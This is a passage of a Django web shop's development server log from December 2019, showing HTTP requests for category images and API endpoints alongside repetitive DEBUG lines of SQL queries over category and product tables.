/media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [20/Dec/2019 06:30:16] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [20/Dec/2019 06:30:19] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [20/Dec/2019 06:30:19] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [20/Dec/2019 06:30:21] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [20/Dec/2019 06:30:24] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 06:35:37,995 utils 4252 140031492613888 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-20 06:35:38,001 utils 4252 140031492613888 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [20/Dec/2019 06:35:38] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-20 06:36:01,769 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:36:01,776 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:36:01,779 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:36:01,782 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:36:01,788 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:36:01,790 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:36:01,793 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:36:01,795 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:36:01,797 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:36:01,802 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:36:01,805 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:36:01,808 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:36:01,812 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:36:01,814 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:36:01,817 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:36:01,820 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:36:01,822 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:36:01,824 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:36:01,826 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:36:01,830 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:36:01,833 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:36:01,835 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:36:01,837 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:36:01,840 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:36:01,842 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:36:01,845 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:36:01,848 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:36:01,850 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:36:01,853 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:36:01,855 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:36:01,859 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:36:01,861 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:36:01,864 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:36:01,866 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:36:01,868 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:36:01,872 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:36:01,874 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:36:01,877 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:36:01,879 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:36:01,881 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:36:01,883 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:36:01,886 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:36:01,889 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:36:01,891 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:36:01,894 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:36:01,896 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:36:01] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:36:01,981 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 06:36:01,987 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [20/Dec/2019 06:36:01] "GET /api/v1/categories/10 HTTP/1.0" 200 353 [20/Dec/2019 06:36:02] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [20/Dec/2019 06:36:02] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [20/Dec/2019 06:36:02] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [20/Dec/2019 06:36:02] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [20/Dec/2019 06:36:02] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [20/Dec/2019 06:36:11] "GET / HTTP/1.0" 302 0 [20/Dec/2019 06:36:18] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [20/Dec/2019 06:36:18] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [20/Dec/2019 06:36:18] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [20/Dec/2019 06:36:18] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [20/Dec/2019 06:36:18] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [20/Dec/2019 06:36:19] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 DEBUG 2019-12-20 06:38:55,955 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:38:55,962 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:38:55,965 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:38:55,968 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:38:55,972 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:38:55,974 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:38:55,977 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:38:55,979 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:38:55,982 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:38:55,986 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:38:55,988 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:38:55,991 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:38:55,993 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:38:55,996 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 